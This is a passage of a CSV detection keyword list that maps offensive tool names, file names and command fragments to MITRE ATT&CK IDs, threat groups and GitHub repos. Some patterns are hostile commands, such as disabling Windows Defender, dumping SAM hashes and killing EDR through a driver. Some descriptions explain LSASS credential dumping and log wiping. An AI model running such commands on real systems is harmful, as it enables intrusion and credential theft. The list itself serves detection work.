open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*safari_proxy_object_type_confusion.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*SafeBreach-Labs/EDRaser*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*safetydump*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*safetydump.ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*safetydump.ninja*","offensive_tool_keyword","Ninja","Open source C2 
server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*SafetyKatz.csproj*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*SafetyKatz.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*SafetyKatz.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*SafetyKatz.exe*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*SafetyKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SafetyKatz.Program*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*SafetyKatz.sln*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z"
+"*safetykatz.txt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*SafetyKatzManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*SafetyKatz-master*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z"
+"*sailay1996*","offensive_tool_keyword","Github Username","github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sailay1996","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Salsa-tools*","offensive_tool_keyword","Salsa-tools","Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined. allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI). most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk Inmersin en la explotacin tiene rima which took place during h-c0n in 9th February 2019","T1027 - T1036 - T1059 - T1071 - T1073 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Hackplayers/Salsa-tools","1","0","N/A","N/A","6","564","140","2020-01-31T22:41:35Z","2019-02-04T21:31:28Z"
+"*sam_the_admin.py*","offensive_tool_keyword","sam-the-admin","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z"
+"*SamAdduser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z"
+"*sambaPipe.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*samdump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*samdump.py*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*samdump.zip*","offensive_tool_keyword","samdump","Dumping sam","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z"
+"*samdump2 *","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A"
+"*samdump2 SYSTEM SAM > *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*samdump2.c*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A"
+"*sample_brc4.json*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z"
+"*samr_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*samratashok/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*samrdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*sandboxevasion.py*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z"
+"*SAP_GW_RCE_exploit*","offensive_tool_keyword","SAP_GW_RCE_exploit","This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!) 
SAPanonGWv2.py is the second version of the exploit based on the pysap library","T1078 - T1046 - T1201 - T1021","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chipik/SAP_GW_RCE_exploit","1","0","N/A","N/A","2","145","48","2020-09-07T13:46:04Z","2019-03-14T13:52:00Z"
+"*sap2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*SauronEye.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*sc config WinDefend start= disabled*","greyware_tool_keyword","shell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*sc create plumber*warpzoneclient*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*sc create Terminator *.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z"
+"*sc delete plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*sc -path c:\inetpub\wwwroot\aspnet_client\test.txt -value teset*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #7","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*sc_inject_direct.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z"
+"*sc_inject_indirect.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z"
+"*sc0tfree*","offensive_tool_keyword","Github Username","github username - Pentester. Red teamer. OSCP. Former wardialer and OKI 900 enthusiast. Senior Security Consultant @ctxis hosting offensve tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sc0tfree","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*sc0tfree/updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
+"*scada_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*scan -T list_of_targets.txt*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z"
+"*scan4all -*.xml*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*scan4all -h*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*scan4all -tp *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 
- T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*scan4all.51pwn.com*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*scan4all_*.*_linux_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*scan4all_*.*_macOS_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*scan4all_*.*_macOS_arm64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - 
Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*scan4all_*.*_windows_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*scan4all_windows_386.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
